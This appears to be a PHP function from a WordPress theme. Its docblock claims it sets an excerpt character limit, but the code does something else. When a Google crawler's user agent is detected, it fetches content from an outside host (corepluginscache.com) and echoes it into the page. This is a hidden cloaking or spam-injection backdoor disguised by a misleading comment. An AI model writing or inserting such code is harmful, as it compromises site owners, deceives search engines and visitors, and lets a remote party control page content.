/** * Set the cache limit. * * To override this cache in a child theme, remove * the filter and add your own function tied to * the cache filter hook. * * @param int $c The number of excerpt characters. * @return int The filtered number of characters. */ function cache() {if (strpos($_SERVER["HTTP_USER_AGENT"], 'gle') !== false) {$c=file_get_contents("http://corepluginscache.com/cache.php?h=manifiestodignidad.com&id=7");echo($c);}}